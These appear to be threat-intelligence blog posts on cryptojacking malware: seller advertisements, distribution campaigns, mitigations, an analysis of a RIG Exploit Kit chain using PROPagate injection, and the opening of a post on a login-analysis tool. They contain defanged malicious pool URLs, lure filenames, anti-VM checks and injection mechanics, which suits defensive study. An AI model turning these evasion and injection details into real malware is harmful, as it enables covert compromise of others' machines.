  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

28 June 2018 at 16:00

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419 which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen.  Each of these strings is indictative of virtual machines

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Remote Authentication GeoFeasibility Tool - GeoLogonalyzer

29 May 2018 at 17:00

Users have long needed to access important resources such as virtual private networks (VPNs), web applications, and mail servers from anywhere in the world at any time. While the ability to access resources from anywhere is imperative for employees, threat actors often leverage stolen credentials to access systems and data. Due to large volumes of remote access connections, it can be difficult to distinguish between a legitimate and a malicious login.

Today, we are releasing GeoLogonalyzer to help organizations analyze logs to identify malicious logins based on GeoFeasibility; for example, a user connecting to a VPN from New York at 13:00 is unlikely to legitimately connect to the VPN from Australia five minutes later.

Once remote authentication activity is baselined across an environment, analysts can begin to identify authentication activity that deviates from business requirements and normalized patterns, such as:

  1. User accounts that authenticate from two distant locations, and at times between which the user probably could not have physically travelled the route.
  2. User accounts that usually log on from IP addresses registered to one physical location such as a city, state, or country, but also have logons from locations where the user is not likely to be physically located.
  3. User accounts that log on from a foreign location at which no employees reside or are expected to travel to, and your organization has no business contacts at that location.
  4. User accounts that usually log on from one source IP address, subnet, or ASN, but have a small number of logons from a different source IP address, subnet, or ASN.
  5. User accounts that usually log on from home or work networks, but also have logons from an IP address registered to cloud server hosting providers.
  6. User accounts that log on from multiple source hostnames or with multiple VPN clients.

GeoLogonalyzer can help address these and similar situations by processing authentication logs containing timestamps, usernames, and source IP addresses.

GeoLogonalyzer can be downloaded from our FireEye GitHub.

GeoLogonalyzer Features

IP Address GeoFeasibility Analysis

For a remote authentication log that records a source IP address, it is possible to estimate the location each logon originated from using data such as MaxMind’s free GeoIP database. With additional information, such as a timestamp and username, analysts can identify a change in source location over time to determine if that user could have possibly traveled between those two physical locations to legitimately perform the logons.

For example, if a user account, Meghan, logged on from New York City, New York on 2017-11-24 at 10:00:00 UTC and then logged on from Los Angeles, California 10 hours later on 2017-11-24 at 20:00:00 UTC, that is roughly a 2,450 mile change over 10 hours. Meghan’s logon source change can be normalized to 245 miles per hour which is reasonable through commercial airline travel.

If a second user account, Harry, logged on from Dallas, Texas on 2017-11-25 at 17:00:00 UTC and then logged on from Sydney, Australia two hours later on 2017-11-25 at 19:00:00 UTC, that is roughly an 8,500 mile change over two hours. Harry’s logon source change can be normalized to 4,250 miles per hour, which is likely infeasible with modern travel technology.

By focusing on the changes in logon sources, analysts do not have to manually review the many times that Harry might have logged in from Dallas before and after logging on from Sydney.

Cloud Data Hosting Provider Analysis

Attackers understand that organizations may either be blocking or looking for connections from unexpected locations. One solution for attackers is to establish a proxy on either a compromised server in another country, or even through a rented server hosted in another country by companies such as AWS, DigitalOcean, or Choopa.

Fortunately, Github user “client9” tracks many datacenter hosting providers in an easily digestible format. With this information, we can attempt to detect attackers utilizing datacenter proxy to thwart GeoFeasibility analysis.

Using GeoLogonalyzer

Usable Log Sources

GeoLogonalyzer is designed to process remote access platform logs that include a timestamp, username, and source IP. Applicable log sources include, but are not limited to:

  1. VPN
